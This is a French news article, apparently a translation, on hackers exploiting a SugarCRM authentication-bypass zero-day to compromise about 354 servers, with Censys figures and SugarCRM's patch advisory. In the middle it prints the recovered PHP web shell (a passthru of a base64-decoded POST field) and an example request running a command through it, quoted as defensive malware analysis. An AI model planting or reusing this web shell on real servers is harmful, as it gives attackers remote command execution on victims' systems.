Au cours des deux dernières semaines, des pirates ont exploité une vulnérabilité critique du système SugarCRM (gestion de la relation client) pour infecter les utilisateurs avec des logiciels malveillants qui leur donnent le contrôle total de leurs serveurs.
La vulnérabilité a commencé comme un jour zéro lorsque le code d’exploitation a été mis en ligne fin décembre. La personne qui a posté l’exploit l’a décrit comme un contournement d’authentification avec exécution de code à distance, ce qui signifie qu’un attaquant pourrait l’utiliser pour exécuter du code malveillant sur des serveurs vulnérables sans informations d’identification requises. SugarCRM a depuis publié un avis qui confirme cette description. La publication sur l’exploit comprenait également divers « dorks », qui sont de simples recherches sur le Web que les gens peuvent effectuer pour localiser des serveurs vulnérables sur Internet.
Mark Ellzey, chercheur principal en sécurité au service de surveillance du réseau Censys, a déclaré dans un e-mail qu’au 11 janvier, la société avait détecté 354 serveurs SugarCRM infectés à l’aide du jour zéro. Cela représente près de 12 % du total de 3 059 serveurs SugarCRM détectés par Censys. La semaine dernière, les infections étaient les plus élevées aux États-Unis, avec 90, suivis de l’Allemagne, de l’Australie et de la France. Dans une mise à jour de mardi, Censys a déclaré que le nombre d’infections n’avait pas beaucoup augmenté depuis le message d’origine.
L’avis de SugarCRM, publié le 5 janvier, rendait disponibles des correctifs et indiquait qu’ils avaient déjà été appliqués à son service basé sur le cloud. Il a également conseillé aux utilisateurs dont les instances s’exécutaient en dehors de l’hébergement géré par SugarCloud ou SugarCRM d’installer les correctifs. L’avis indiquait que la vulnérabilité affectait les solutions logicielles Sugar Sell, Serve, Enterprise, Professional et Ultimate. Cela n’a pas eu d’impact sur le logiciel Sugar Market.
Le contournement de l’authentification, a déclaré Censys, va à l’encontre de la /index.php/
annuaire. « Une fois le contournement de l’authentification réussi, un cookie est obtenu du service et une requête POST secondaire est envoyée au chemin ‘/cache/images/sweet.phar’ qui télécharge un petit fichier encodé au format PNG contenant du code PHP qui sera exécuté par le serveur lorsqu’une autre demande de fichier est faite », ont ajouté les chercheurs de l’entreprise.
Lorsque le binaire est analysé à l’aide d’un logiciel de vidage hexadécimal et décodé, le code PHP se traduit approximativement par :
〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉
« Il s’agit d’un simple shell Web qui exécutera des commandes basées sur la valeur d’argument de requête encodée en base64 de ‘c’ (par exemple, ‘POST /cache/images/sweet.phar?c= »L2Jpbi9pZA== » HTTP/1.1’, qui exécutera la commande « / bin / id » avec les mêmes autorisations que l’ID utilisateur exécutant le service Web) « , a expliqué le message.
Un shell Web fournit une fenêtre textuelle que les attaquants peuvent utiliser comme interface pour exécuter des commandes ou du code de leur choix sur des appareils compromis. Ellzey de Censys a déclaré que la société n’avait pas de visibilité sur la raison précise pour laquelle les attaquants utilisent les obus.
Les avis Censys et SugarCRM fournissent des indicateurs de compromission que les clients de SugarCRM peuvent utiliser pour déterminer s’ils ont été ciblés. Les utilisateurs de produits vulnérables doivent rechercher et installer les correctifs dès que possible.